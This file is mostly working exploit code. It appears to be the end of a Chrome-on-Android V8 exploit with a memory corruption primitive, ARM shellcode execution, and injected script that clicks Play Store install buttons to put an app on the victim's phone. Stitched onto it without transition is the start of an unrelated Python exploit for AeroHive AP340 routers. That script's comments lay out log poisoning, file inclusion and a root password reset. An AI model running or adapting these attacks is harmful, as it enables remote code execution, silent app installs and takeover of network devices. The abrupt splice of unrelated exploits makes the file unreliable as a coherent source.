print("good state "+straddr.toString(16));
break;
}
}
}
function myencode(str){
var arr = [];
for(var i=0;i<str.length;i++){
if(i%2==1)
arr.push(str.charCodeAt(i));
else{
arr.push(37);//%
var hexstr = (str.charCodeAt(i)+0x100).toString(16).substr(-2);
arr.push(hexstr.charCodeAt(0));
arr.push(hexstr.charCodeAt(1));
}
}
return String.fromCharCode.apply(null,arr);
}
var dArray = [];
var index = (0x8100-36)*2;
for(var i=0;i<0x20000/8;i++){
dArray[i]=str_to_double("%03x%03x");
}
var occulen = 0;
var i = 0;
var savedChunk = new Uint8Array(0x8100);
var hiddenValue = getHiddenValue();
var arr=[];
fillNewSpace(new String);
findNewSpace();
var classStr = 'class x extends Array{}';
for(var i=0;i<classStr.length;i++){
arr[i]=classStr.charCodeAt(i);
}
var magicStr = String.fromCharCode(0x86,0x24);
classStr=String.fromCharCode.apply(null,arr);
var ab = new ArrayBuffer(0x1243);
var fun = eval(classStr);
Object.assign(fun,hiddenValue);
var oobStr = fun.toString();
/*(gdb) x/20xw 0x5600c45c array buffer layout
* 0x5600c45c: 0x4b009a9d 0x41008125 0x41008125 0x00000020
* 0x5600c46c: 0x09fda368 0x00000004 0x00000000 0x00000000
*/
//overwrite huge string as array buffer
var abLengthIndex = oobStr.indexOf(magicStr);
var strArrayBuffer = oobStr.substr(abLengthIndex-12,32);
//replace the byteLength
var LengthAddr = getObjAddr(lengthInOldSpace);
var strLength = String.fromCharCode(0xff&LengthAddr,(0xff00&LengthAddr)>>8,(0xff0000&LengthAddr)>>16,(0xff000000&LengthAddr)>>24);
var strBase = "\x00\x00\x00\x00";
strArrayBuffer = strArrayBuffer.substr(0,12)+strLength+strBase+strArrayBuffer.substr(20,12);
strArrayBuffer = myencode(strArrayBuffer);
for(var i=0;i<strArrayBuffer.length/8;i++){
var d = strArrayBuffer.substr(i*8,8);
dArray[index/8+i] = str_to_double(d);
}
var classStrAddr = getObjAddr(classStr)>>>0;
//set read position
var readOffset = 0x100000-((classStrAddr-1)&0xfffff)-12-0x40000;//12 string head
//length control the length of unscaped string, generated string has 12 bytes head
//left 0x1000*2 bytes to avoid gc
var subOobStr = oobStr.substr(readOffset,0x40000-24-0x2000);
//save the the chunk head to be corrupted
var nextThunkOffset = 0x100000-((classStrAddr-1)&0xfffff)-12;
var savedThunkStr = oobStr.substr(nextThunkOffset,0x8100);
for(var i =0;i<savedThunkStr.length;i++){
savedChunk[i] = savedThunkStr.charCodeAt(i);
}
var pos1=new String;
var pos1addr = getObj24BitsAddr(pos1)-1;
//0x10 size of JSArray, 0x10 size of String head, 8 ALLOCATION_MEMENTO_TYPE 8 fixedarray
occulen =0x100000-((pos1addr+0x10+0x10+0x8+0x8)&0xfffff);
//minus the length of double array
if(occulen<0x40000+16+8)
throw "no enough room";
occulen = occulen - 0x40000-16-8;//16 size of JSArray, 8 fixedarray
if(occulen%4!==0)
throw "length don't align";
var arrocc=new Array((occulen/4));
//set unescape write position
var occDoubleArray = dArray.concat();
var b=unescape(subOobStr);
//restore the corrupted chunk head
var u8 = new Uint8Array(selectedStr,nextTrunk,0x8100);
for(var i=0;i<savedChunk.length;i++){
u8[i] = savedChunk[i];
}
print("long string allocated at "+classStrAddr.toString(16));
if(typeof(selectedStr)==="string"){
print("overwrite failed");
postMessage(false);
close();
return;
//throw "overwrite failed";
}
var fakeab = selectedStr;
print("faked array buffer byte length is "+fakeab.byteLength.toString(16));
var globaldv = new Uint32Array(fakeab);
function read_uint32(from_address){
var u32 = globaldv[(from_address/4)>>>0];
return u32>>>0;
}
function read_uint8(from_address){
from_address = from_address>>>0;
var index = (from_address/4)>>>0;
var mask = from_address%4;
var u32 = globaldv[index];
u32 = u32<<8*(3-mask);
return u32>>>24;
}
function read_uint32_unalign(from_address){
var u32 = 0;
for(var i=3;i>=0;i--){
var u8 = read_uint8(from_address+i);
u32 = u32*0x100+u8;
}
return u32>>>0;
}
//rw to execute
//get function point of v8::internal::Accessors::ReconfigureToDataProperty
function getFixedFunctionPoint(fakeab){
var FunctionAddress = getObjAddr(Function);
var u32 = new Uint32Array(fakeab,FunctionAddress-1,0x1000);
var map = u32[0];
u32 = new Uint32Array(fakeab,map-1,0x1000);
//instance descriptors
var descriptors = u32[7];
u32 = new Uint32Array(fakeab,descriptors-1,0x1000);
var lengthAccessorInfo = u32[6];
u32 = new Uint32Array(fakeab,lengthAccessorInfo-1,0x1000);
var setterForeign = u32[4];
u32 = new Uint32Array(fakeab,setterForeign-1,0x1000);
var functionPoint = u32[1];
return functionPoint-1;
}
var funPoint = getFixedFunctionPoint(fakeab);
print("ReconfigureToDataProperty at"+funPoint.toString(16));
var pattern=[0x03,0x46,0x18,0xb1,0x20,0x46,0x98,0x47,0x04,0x46];//get_elf_hwcap_from_getauxval
var point = ((funPoint&~0xfff)-0xdb6000)>>>0;//cf0000
print("chrome.apk base at "+point.toString(16));
function find(startAddr,len,pattern){
for(var i=0; i<(len-pattern.length); i++ ) {
for(var j=0;j<pattern.length;j++){
var temp = read_uint8(startAddr+i+j);
//print(temp.toString(16));
if(temp!=pattern[j]) break;
}
if(j==pattern.length) return startAddr+i;
}
print("find failed");
}
var pattern_position=find(point,0x10000000,pattern);
print("find pattern at "+to_hex(pattern_position));
function get_dest_from_blx(addr) {
var val = read_uint32_unalign(addr);
var s = (val & 0x400) >> 10;
var i1 = 1 - (((val & 0x20000000) >> 29) ^ s);
var i2 = 1 - (((val & 0x8000000) >> 27) ^ s);
var i10h = val & 0x3ff;
var i10l = (val & 0x7fe0000) >> 17;
var off = ((s * 0xff) << 24) | (i1 << 23) | (i2 << 22) | (i10h << 12) | (i10l << 2);
return ((addr + 4) & ~3) + off;
}
function backup_original_code(start_address){
var backup_arr = [];
set_access_address(start_address);
var u8arr=new Uint8Array(faked_ab);
for(var i=0;i<shellcode.length+4096;i++){
backup_arr[i]=u8arr[i];
}
return backup_arr;
}
function restore_original_code(start_address,backup_arr){
set_access_address(start_address);
var u8arr=new Uint8Array(faked_ab);
for(var i=0;i<shellcode.length+4096;i++){
u8arr[i]=backup_arr[i];
}
}
huge_func({});
print("blx instruction content is "+to_hex(read_uint32_unalign(pattern_position-4)));
var dlsym_addr = get_dest_from_blx(pattern_position-4);
print("dlsym address is "+to_hex(dlsym_addr));
var huge_func_address = getObjAddr(huge_func)-1;
print("huge func address is "+to_hex(huge_func_address));
for(var i=0;i<20;i++){
print(to_hex(read_uint32(huge_func_address+i*4)));
}
var huge_func_code_entry = read_uint32(huge_func_address+7*4);//dynamic kCodeEntryOffset 3*4
print("huge func code entry is "+to_hex(huge_func_code_entry));
print(to_hex(read_uint32(huge_func_code_entry)));
//var so_str= "";
var shellcode = [0xf0,0x4f,0x2d,0xe9,0x79,0x30,0xa0,0xe3,0x8c,0x0b,0xdf,0xed,0x4b,0xdf,0x4d,0xe2,0x61,0x80,0xa0,0xe3,0x00,0x60,0xa0,0xe3,0x73,0x10,0xa0,0xe3,0x74,0x20,0xa0,0xe3,0x5f,0x90,0xa0,0xe3,0x61,0x30,0xcd,0xe5,0x65,0xa0,0xa0,0xe3,0x6d,0xb0,0xa0,0xe3,0x5b,0x30,0xcd,0xe5,0x6e,0xc0,0xa0,0xe3,0x6c,0x30,0xa0,0xe3,0xfa,0x80,0xcd,0xe5,0x64,0x70,0xa0,0xe3,0x72,0x50,0xa0,0xe3,0x60,0x10,0xcd,0xe5,0x6f,0x40,0xa0,0xe3,0x69,0xe0,0xa0,0xe3,0x62,0x10,0xcd,0xe5,0x67,0x80,0xa0,0xe3,0x5a,0x10,0xcd,0xe5,0x18,0x00,0x8d,0xe5,0x70,0x00,0xa0,0xe3,0x63,0x20,0xcd,0xe5,0x0a,0x21,0xcd,0xe5,0x64,0xa0,0xcd,0xe5,0x65,0xb0,0xcd,0xe5,0x5c,0xb0,0xcd,0xe5,0xf8,0x90,0xcd,0xe5,0xf9,0x90,0xcd,0xe5,0x01,0x91,0xcd,0xe5,0x05,0x91,0xcd,0xe5,0x20,0x90,0xa0,0xe3,0xfb,0xc0,0xcd,0xe5,0x09,0xc1,0xcd,0xe5,0xfc,0x70,0xcd,0xe5,0x00,0x71,0xcd,0xe5,0x58,0x70,0xcd,0xe5,0x78,0x70,0xa0,0xe3,0xfd,0x50,0xcd,0xe5,0x07,0x51,0xcd,0xe5,0xfe,0x40,0xcd,0xe5,0x03,0x41,0xcd,0xe5,0xff,0xe0,0xcd,0xe5,0x08,0xe1,0xcd,0xe5,0x02,0x31,0xcd,0xe5,0x59,0x30,0xcd,0xe5,0x66,0x60,0xcd,0xe5,0x0b,0x61,0xcd,0xe5,0x5d,0x60,0xcd,0xe5,0x04,0x81,0xcd,0xe5,0x25,0x80,0xa0,0xe3,0x1c,0x0b,0xcd,0xed,0xeb,0x10,0xcd,0xe5,0x18,0x10,0x9d,0xe5,0x9c,0x20,0xcd,0xe5,0x9f,0x20,0xcd,0xe5,0x18,0x20,0x9d,0xe5,0x98,0xb0,0xcd,0xe5,0x2c,0xb0,0xa0,0xe3,0x9d,0xa0,0xcd,0xe5,0xe8,0xe0,0xcd,0xe5,0x63,0xe0,0xa0,0xe3,0xe9,0xc0,0xcd,0xe5,0xe8,0xc0,0x8d,0xe2,0xed,0xa0,0xcd,0xe5,0x70,0xa0,0x8d,0xe2,0xee,0x30,0xcd,0xe5,0xef,0x30,0xcd,0xe5,0x68,0x30,0xa0,0xe3,0x34,0xc0,0x8d,0xe5,0x9e,0xe0,0xcd,0xe5,0xec,0x30,0xcd,0xe5,0x06,0x01,0xcd,0xe5,0x99,0x00,0xcd,0xe5,0x06,0x00,0xa0,0xe1,0x9a,0x50,0xcd,0xe5,0x00,0x50,0x91,0xe5,0x06,0x10,0xa0,0xe1,0x9b,0x40,0xcd,0xe5,0x04,0x40,0x92,0xe5,0x38,0xa0,0x8d,0xe5,0xea,0x90,0xcd,0xe5,0xf0,0x90,0xcd,0xe5,0xf1,0x80,0xcd,0xe5,0xf4,0x80,0xcd,0xe5,0xf2,0x70,0xcd,0xe5,0xf5,0x70,0xcd,0xe5,0xf3,0xb0,0xcd,0xe5,0xa0,0x60,0xcd,0xe5,0xf6,0x60,0xcd,0xe5,0x35,0xff,0x2f,0xe1,0x10,0x00,0x8d,0xe5,0x58,0x10,0x8d,0xe2,0x34,0xff,0x2f,0xe1,0x1c,0x00,0x8d,0xe5,0xf8,0x10,0x8d,0xe2,0x10,0x00,0x9d,0xe5,0x1c,0x90,0x9d,0xe5,0x39,0xff,0x2f,0xe1,0x18,0x80,0x9d,0xe5,0x30,0x00,0x8d,0xe5,0xe8,0x20,0x8d,0xe2,0x70,0x10,0x8d,0xe2,0x30,0xb0,0x9d,0xe5,0x02,0x00,0xa0,0xe3,0x04,0x70,0x98,0xe5,0x00,0x30,0x98,0xe5,0x00,0x70,0x8d,0xe5,0x3b,0xff,0x2f,0xe1,0x60,0x10,0x8d,0xe2,0x1c,0x50,0x9d,0xe5,0x10,0x00,0x9d,0xe5,0x35,0xff,0x2f,0xe1,0x00,0x20,0xa0,0xe1,0x70,0x10,0x8d,0xe2,0x02,0x30,0xa0,0xe1,0x02,0x00,0xa0,0xe3,0x00,0x20,0x8d,0xe5,0xe8,0x20,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x98,0x10,0x8d,0xe2,0x1c,0x40,0x9d,0xe5,0x10,0x00,0x9d,0xe5,0x34,0xff,0x2f,0xe1,0x00,0xa0,0xa0,0xe1,0x18,0x00,0x9d,0xe5,0x07,0x20,0xa0,0xe3,0x0b,0x1a,0xa0,0xe3,0x10,0x50,0x90,0xe5,0xff,0xce,0xc5,0xe3,0x05,0x4a,0x85,0xe2,0x0f,0x30,0xcc,0xe3,0x01,0x0a,0x83,0xe2,0x3a,0xff,0x2f,0xe1,0xbc,0x72,0xd5,0xe1,0x1c,0x90,0x95,0xe5,0x06,0x00,0x57,0xe1,0x09,0x20,0x85,0xe0,0x06,0x00,0x00,0x1a,0x1b,0x00,0x00,0xea,0x65,0x78,0x70,0x6c,0x6f,0x69,0x74,0x00,0x01,0x60,0x86,0xe2,0x20,0x20,0x82,0xe2,0x07,0x00,0x56,0xe1,0x15,0x00,0x00,0x2a,0x00,0xe0,0x92,0xe5,0x01,0x00,0x5e,0xe3,0xf8,0xff,0xff,0x1a,0x10,0x80,0x92,0xe5,0x00,0x00,0x58,0xe3,0xf5,0xff,0xff,0x0a,0x00,0x00,0xa0,0xe3,0x04,0x70,0x92,0xe5,0x00,0xb0,0x85,0xe0,0x00,0xa0,0x84,0xe0,0x08,0x10,0x92,0xe5,0x01,0x00,0x80,0xe2,0x07,0xc0,0xdb,0xe7,0x01,0xc0,0xca,0xe7,0x10,0x30,0x92,0xe5,0x03,0x00,0x50,0xe1,0xf5,0xff,0xff,0x3a,0xbc,0x72,0xd5,0xe1,0x01,0x60,0x86,0xe2,0x20,0x20,0x82,0xe2,0x07,0x00,0x56,0xe1,0xe9,0xff,0xff,0x3a,0x5f,0xe0,0xa0,0xe3,0x1f,0x0b,0x1f,0xed,0x61,0xb0,0xa0,0xe3,0x72,0x60,0xa0,0xe3,0x00,0x90,0xa0,0xe3,0x10,0x00,0x9d,0xe5,0x64,0xa0,0xa0,0xe3,0x74,0x70,0xa0,0xe3,0x10,0xe1,0xcd,0xe5,0x6e,0x80,0xa0,0xe3,0x69,0x30,0xa0,0xe3,0x11,0xe1,0xcd,0xe5,0x6f,0xc0,0xa0,0xe3,0x6c,0x20,0xa0,0xe3,0x19,0xe1,0xcd,0xe5,0x1d,0xe1,0xcd,0xe5,0x67,0xe0,0xa0,0xe3,0x1e,0x0b,0x8d,0xed,0x12,0xb1,0xcd,0xe5,0x70,0xb0,0xa0,0xe3,0x11,0x1e,0x8d,0xe2,0x14,0xa1,0xcd,0xe5,0x18,0xa1,0xcd,0xe5,0x15,0x61,0xcd,0xe5,0x1f,0x61,0xcd,0xe5,0x16,0xc1,0xcd,0xe5,0x1b,0xc1,0xcd,0xe5,0x1c,0xc0,0x9d,0xe5,0x17,0x31,0xcd,0xe5,0x20,0x31,0xcd,0xe5,0x1a,0x21,0xcd,0xe5,0x1c,0xe1,0xcd,0xe5,0x1e,0xb1,0xcd,0xe5,0x6d,0xb0,0xa0,0xe3,0x13,0x81,0xcd,0xe5,0x21,0x81,0xcd,0xe5,0x22,0x71,0xcd,0xe5,0x23,0x91,0xcd,0xe5,0x3c,0xff,0x2f,0xe1,0x63,0x30,0xa0,0xe3,0x70,0x20,0xa0,0xe3,0x14,0x00,0x8d,0xe5,0x73,0xe0,0xa0,0xe3,0x68,0x10,0x8d,0xe2,0x6a,0x60,0xcd,0xe5,0x6d,0x20,0xcd,0xe5,0x1c,0xc0,0x9d,0xe5,0x68,0xe0,0xcd,0xe5,0x10,0x00,0x9d,0xe5,0x6b,0x30,0xcd,0xe5,0x6c,0xb0,0xcd,0xe5,0x69,0x70,0xcd,0xe5,0x6e,0x90,0xcd,0xe5,0x3c,0xff,0x2f,0xe1,0x20,0xc0,0x95,0xe5,0xb0,0x90,0xcd,0xe5,0x78,0x20,0xa0,0xe3,0xb2,0xe3,0xd5,0xe1,0x25,0x10,0xa0,0xe3,0x2c,0x30,0xa0,0xe3,0xa9,0x20,0xcd,0xe5,0x00,0xb0,0xa0,0xe1,0x02,0x00,0xa0,0xe3,0xa8,0x10,0xcd,0xe5,0x0c,0xc0,0x85,0xe0,0xab,0x10,0xcd,0xe5,0x0e,0xe1,0x8e,0xe0,0xae,0x10,0xcd,0xe5,0x02,0x10,0x8d,0xe0,0x20,0xc0,0x8d,0xe5,0x20,0xc0,0x95,0xe5,0xac,0x20,0xcd,0xe5,0xaf,0x20,0xcd,0xe5,0xa8,0x20,0x8d,0xe2,0xaa,0x30,0xcd,0xe5,0x8e,0xe1,0x8c,0xe0,0xad,0x30,0xcd,0xe5,0x05,0x30,0xa0,0xe1,0x05,0xc0,0x8e,0xe0,0x10,0xe0,0x9c,0xe5,0x00,0xc0,0x8d,0xe5,0x0e,0xc0,0x85,0xe0,0x24,0xc0,0x8d,0xe5,0x04,0xc0,0x8d,0xe5,0x14,0xc0,0x9d,0xe5,0x3c,0xff,0x2f,0xe1,0x73,0xe0,0xa0,0xe3,0x6d,0x00,0xa0,0xe3,0x89,0xa0,0xcd,0xe5,0x67,0xc0,0xa0,0xe3,0x2e,0x30,0xa0,0xe3,0x91,0xa0,0xcd,0xe5,0x79,0x20,0xa0,0xe3,0x65,0x10,0xa0,0xe3,0x8c,0xe0,0xcd,0xe5,0x8e,0x00,0xcd,0xe5,0x6c,0x00,0xa0,0xe3,0x94,0xe0,0xcd,0xe5,0x6f,0xe0,0xa0,0xe3,0x51,0xc0,0xcd,0xe5,0x70,0xc0,0xa0,0xe3,0x96,0x60,0xcd,0xe5,0x52,0xe0,0xcd,0xe5,0x5f,0xe0,0xa0,0xe3,0xb5,0x60,0xcd,0xe5,0xb7,0x00,0xcd,0xe5,0xb9,0xc0,0xcd,0xe5,0x69,0xc0,0xa0,0xe3,0xba,0x00,0xcd,0xe5,0xc1,0x60,0xcd,0xe5,0x8b,0x80,0xcd,0xe5,0x8f,0x90,0xcd,0xe5,0x93,0x80,0xcd,0xe5,0x95,0x70,0xcd,0xe5,0x97,0x90,0xcd,0xe5,0x53,0x70,0xcd,0xe5,0x54,0x90,0xcd,0xe5,0xbb,0x70,0xcd,0xe5,0xbc,0x90,0xcd,0xe5,0x88,0x30,0xcd,0xe5,0x90,0x30,0xcd,0xe5,0x50,0x30,0xcd,0xe5,0xb4,0x30,0xcd,0xe5,0xb8,0x30,0xcd,0xe5,0xc0,0x30,0xcd,0xe5,0x8a,0x20,0xcd,0xe5,0x8d,0x20,0xcd,0xe5,0x92,0x20,0xcd,0xe5,0xb6,0x10,0xcd,0xe5,0xc2,0x10,0xcd,0xe5,0xc3,0x00,0xcd,0xe5,0xb0,0x03,0xd5,0xe1,0xd1,0xe0,0xcd,0xe5,0x61,0xe0,0xa0,0xe3,0xc5,0xa0,0xcd,0xe5,0xd3,0x60,0xcd,0xe5,0xd4,0x60,0xcd,0xe5,0x09,0x00,0x50,0xe1,0xd9,0xa0,0xcd,0xe5,0x6c,0xa0,0xa0,0xe3,0xde,0x60,0xcd,0xe5,0xe2,0x60,0xcd,0xe5,0x6f,0x60,0xa0,0xe3,0xc4,0x30,0xcd,0xe5,0xc6,0x20,0xcd,0xe5,0xc7,0x80,0xcd,0xe5,0xc8,0x90,0xcd,0xe5,0xcc,0x30,0xcd,0xe5,0xcd,0xc0,0xcd,0xe5,0xce,0x80,0xcd,0xe5,0xcf,0xc0,0xcd,0xe5,0xd0,0x70,0xcd,0xe5,0xd2,0xe0,0xcd,0xe5,0xd5,0xe0,0xcd,0xe5,0xd6,0x20,0xcd,0xe5,0xd7,0x90,0xcd,0xe5,0xd8,0x30,0xcd,0xe5,0xda,0xe0,0xcd,0xe5,0xdb,0x70,0xcd,0xe5,0xdc,0xe0,0xcd,0xe5,0xdd,0x30,0xcd,0xe5,0xdf,0x10,0xcd,0xe5,0xe0,0xa0,0xcd,0xe5,0xe1,0x30,0xcd,0xe5,0xe3,0x60,0xcd,0xe5,0xe4,0x90,0xcd,0xe5,0xa6,0x00,0x00,0x0a,0xcc,0xa0,0x8d,0xe2,0xd8,0x60,0x8d,0xe2,0x20,0x70,0x9d,0xe5,0x88,0x20,0x8d,0xe2,0x90,0x30,0x8d,0xe2,0x20,0x90,0x8d,0xe5,0x2c,0x90,0x8d,0xe5,0x09,0x80,0xa0,0xe1,0x50,0x00,0x8d,0xe2,0xb4,0xc0,0x8d,0xe2,0xc0,0xe0,0x8d,0xe2,0x40,0xa0,0x8d,0xe5,0x48,0x60,0x8d,0xe5,0x03,0xa0,0xa0,0xe1,0x24,0x60,0x9d,0xe5,0x44,0x90,0x8d,0xe5,0x24,0x90,0x8d,0xe5,0x02,0x90,0xa0,0xe1,0x14,0x00,0x8d,0xe5,0x28,0xc0,0x8d,0xe5,0x3c,0xe0,0x8d,0xe5,0x4c,0x40,0x8d,0xe5,0x00,0x40,0x97,0xe5,0x09,0x10,0xa0,0xe1,0x04,0x40,0x86,0xe0,0x04,0x00,0xa0,0xe1,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x24,0x70,0x8d,0x05,0x1e,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0x0a,0x10,0xa0,0xe1,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x2c,0x70,0x8d,0x05,0x18,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0x50,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x13,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xb4,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x20,0x70,0x8d,0x05,0x0d,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xc0,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x44,0x70,0x8d,0x05,0x07,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xcc,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x02,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xd8,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0xb0,0x13,0xd5,0xe1,0x01,0x80,0x88,0xe2,0x28,0x70,0x87,0xe2,0x01,0x00,0x58,0xe1,0xd3,0xff,0xff,0xba,0x4c,0x40,0x9d,0xe5,0x44,0x90,0x9d,0xe5,0x24,0xa0,0x9d,0xe5,0x20,0x20,0x9d,0xe5,0x2c,0x30,0x9d,0xe5,0x20,0xc0,0x9d,0xe5,0x14,0xe0,0x92,0xe5,0x10,0x10,0x93,0xe5,0x10,0x30,0x9a,0xe5,0x10,0x60,0x9c,0xe5,0xae,0x21,0xb0,0xe1,0x01,0x70,0x85,0xe0,0x03,0xe0,0x85,0xe0,0x06,0x60,0x85,0xe0,0x1b,0x00,0x00,0x0a,0x00,0x80,0xa0,0xe3,0x24,0xb0,0x8d,0xe5,0x1c,0xb0,0x9d,0xe5,0x1c,0x90,0x8d,0xe5,0x08,0x90,0xa0,0xe1,0x20,0x80,0x9d,0xe5,0x20,0xa0,0x8d,0xe5,0x06,0xa0,0xa0,0xe1,0x0e,0x60,0xa0,0xe1,0x14,0x50,0x8d,0xe5,0x04,0x20,0x9a,0xe5,0x01,0x90,0x89,0xe2,0x08,0xa0,0x8a,0xe2,0x08,0x50,0x1a,0xe5,0x10,0x00,0x9d,0xe5,0x52,0xe4,0xef,0xe7,0x0e,0x12,0x96,0xe7,0x01,0x10,0x87,0xe0,0x3b,0xff,0x2f,0xe1,0x05,0x00,0x84,0xe7,0x14,0x30,0x98,0xe5,0xa3,0x01,0x59,0xe1,0xf2,0xff,0xff,0x3a,0x14,0x50,0x9d,0xe5,0x06,0xe0,0xa0,0xe1,0x24,0xb0,0x9d,0xe5,0x1c,0x90,0x9d,0xe5,0x20,0xa0,0x9d,0xe5,0x14,0xc0,0x99,0xe5,0x10,0x20,0x99,0xe5,0xac,0x11,0xb0,0xe1,0x00,0x10,0xa0,0x13,0x02,0x50,0x85,0xe0,0x01,0x00,0xa0,0x11,0x0c,0x00,0x00,0x0a,0x01,0x30,0xa0,0xe1,0x01,0x00,0x80,0xe2,0x05,0xc0,0xb3,0xe7,0x08,0x10,0x81,0xe2,0x04,0x20,0x93,0xe5,0x52,0x34,0xef,0xe7,0x03,0x22,0x8e,0xe0,0x04,0x30,0x92,0xe5,0x04,0x20,0x83,0xe0,0x04,0x20,0x8c,0xe7,0x14,0xc0,0x99,0xe5,0xac,0x01,0x50,0xe1,0xf2,0xff,0xff,0x3a,0x14,0x00,0x9a,0xe5,0x2b,0x1b,0x9f,0xed,0x20,0x22,0xb0,0xe1,0x20,0x1b,0x8d,0xed,0x0e,0x80,0xa0,0x11,0x00,0x60,0xa0,0x13,0x80,0x50,0x8d,0x12,0x04,0x00,0x00,0x1a,0x0d,0x00,0x00,0xea,0x14,0x90,0x9a,0xe5,0x10,0x80,0x88,0xe2,0x29,0x02,0x56,0xe1,0x09,0x00,0x00,0x2a,0x00,0xe0,0x98,0xe5,0x05,0x10,0xa0,0xe1,0x01,0x60,0x86,0xe2,0x0e,0x00,0x87,0xe0,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0xf4,0xff,0xff,0x1a,0x04,0x70,0x98,0xe5,0x07,0x40,0x84,0xe0,0x01,0x00,0x00,0xea,0xcc,0x4c,0x0c,0xe3,0x14,0x48,0xdf,0xe7,0x18,0xb0,0x9d,0xe5,0x70,0x10,0x8d,0xe2,0xe8,0x20,0x8d,0xe2,0x30,0x50,0x9d,0xe5,0x02,0x00,0xa0,0xe3,0x0c,0xa0,0x9b,0xe5,0x08,0x30,0x9b,0xe5,0x00,0xa0,0x8d,0xe5,0x35,0xff,0x2f,0xe1,0x18,0x00,0x9d,0xe5,0x34,0xff,0x2f,0xe1,0x4b,0xdf,0x8d,0xe2,0xf0,0x8f,0xbd,0xe8,0x00,0x90,0xa0,0xe1,0x20,0x00,0x8d,0xe5,0x00,0xa0,0xa0,0xe1,0x2c,0x00,0x8d,0xe5,0x00,0x20,0xa0,0xe1,0x00,0x30,0xa0,0xe1,0x98,0xff,0xff,0xea,0x00,0xf0,0x20,0xe3,0x73,0x6f,0x5f,0x6d,0x61,0x69,0x6e,0x00,];
var so_str = "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";
var arrayBuffer = new ArrayBuffer(0x1000000);
var arrayBufferAddress = getObjAddr(arrayBuffer)-1;
var backingStoreAddress = read_uint32(arrayBufferAddress+4*4);
var args_address = backingStoreAddress+1024;
function write_shellcode(dlsym_addr,buffer){
//ldr r0,[pc,4]//0xe59f0004
//ldr r1,[pc,4]//0xe59f1004
//b shellcode;//0xea000001
//dlopen_addr//array_buffer_address
//dlsym_addr
//shellcode
//var stub=[0xe59f0004,0xe59f1004,0xea000001,dlsym_addr+0xc,dlsym_addr];
var stub=[0xe59f0004,0xe59f1004,0xea000001,args_address,0x1000000];
for(var i=0;i<stub.length;i++){
globaldv[buffer/4+i]=stub[i];
}
shellcode = shellcode.concat([0,0,0,0]);
for(var i=0;i<shellcode.length/4>>>0;i++){
// u8arr[i+4*stub.length]=shellcode[i];
globaldv[buffer/4+stub.length+i] = (shellcode[4*i+3]<<24)+(shellcode[4*i+2]<<16)+(shellcode[4*i+1]<<8)+(shellcode[4*i]);
}
return stub.length*4+shellcode.length;
}
function xss_code(){
//alert(navigator.userAgent);
//alert(document.cookie);
var i1=setInterval(function(){
if(!(document&&document.body&&document.body.innerHTML&&document.body.innerHTML.match(/This app is compatible/)!=null)){
console.log("wait load complete");
return;
}
clearInterval(i1);
var i2=setInterval(function(){
document.getElementsByClassName("price buy id-track-click")[0].click();
var installButton = document.getElementById("purchase-ok-button");
if(installButton == null)
return;
installButton.click();
document.write("<h1>The app will be installed shortly, Pwned by 360 Alpha Team</h1>");
clearInterval(i2);
setTimeout(function(){
window.open("intent://scan/#Intent;scheme=zxing;package=com.google.zxing.client.android;end");
},26000);
},500);
},500);
}
var js_str="\n"+xss_code.toString()+"xss_code();\n";
//var backup_arr = backup_original_code(huge_func_code_entry);
var writed_len = write_shellcode(dlsym_addr,huge_func_code_entry);
var args_view = new DataView(arrayBuffer,1024,100);
var so_file_view = new DataView(arrayBuffer,4096);
var js_view = new DataView(arrayBuffer,0x100000);
args_view.setUint32(0,dlsym_addr+0xc,true);
args_view.setUint32(4,dlsym_addr,true);
args_view.setUint32(8,huge_func_code_entry,true);
args_view.setUint32(12,writed_len,true);
args_view.setUint32(16,backingStoreAddress+4096,true);
args_view.setUint32(20,so_str.length/2,true);
args_view.setUint32(24,backingStoreAddress+0x100000,true);
args_view.setUint32(28,js_str.length,true);
print("length is "+so_str.length);
for(var i=0;i<so_str.length;i+=2){
var value = so_str.substr(i,2);
value = "0x"+value;
so_file_view.setUint8(i/2,parseInt(value));
}
for(var i=0;i<js_str.length;i++){
js_view.setUint8(i,js_str.charCodeAt(i));
}
print("begin execute shellcode");
huge_func({});
print("done");
postMessage(true);
//prevent arrayBuffer from being released
while(1){}
}
//main world
function print(){
console.log.apply(null,arguments);
document.write('<p >');
document.write.apply(document,arguments);
document.write("<p>");
}
// Build a worker from an anonymous function body
var blobURL = URL.createObjectURL( new Blob([ '(',exploit.toString(),')()' ], { type: 'application/javascript' } ) );
var worker;
var exploitSucc = false;
var count = 0;
function startExploit(){
print("worker thread is started");
worker = new Worker( blobURL );
count++;
worker.onmessage = function(e){
print("exploit result is "+e.data);
exploitSucc = e.data;
if(exploitSucc==false){
startExploit();
return;
}
var end = +new Date();
print("time diff is "+(end-begin)/1000);
//top.location='https://play.google.com/store/apps/details?id=com.google.zxing.client.android';
top.location='https://play.google.com/store/apps/details?id=com.kitkats.qrscanner';
}
}
var begin = +new Date();
startExploit();
var savedCount = 0;
var hangMonitor = setInterval(function (){
if(exploitSucc==true){
clearInterval(hangMonitor);
}else{
if(savedCount==count){//maybe hang
print("worker may have hung");
worker.terminate();
startExploit();
}else{
print("worker is normal");
savedCount = count;
}
}
},10000);
//URL.revokeObjectURL( blobURL );
</script>
</html>
#!/usr/bin/python3
# TARGET: AeroHive AP340 HiveOS < 6.1r5
# Confirmed working on AP340 HiveOS 6.1r2
# This program uses a local file inclusion vulnerability
# 1. Poison the log file in /var/log/messages by injecting PHP code into the
# username field of the login page
# 2. Call the uploaded PHP shell with the LFI URL, changing the root password for SSH
# 3. Login with SSH as root using password "password"
import sys
from urllib.parse import urlencode
from urllib.request import Request, urlopen
import urllib
# Payload to poison the log file at /var/log/messages
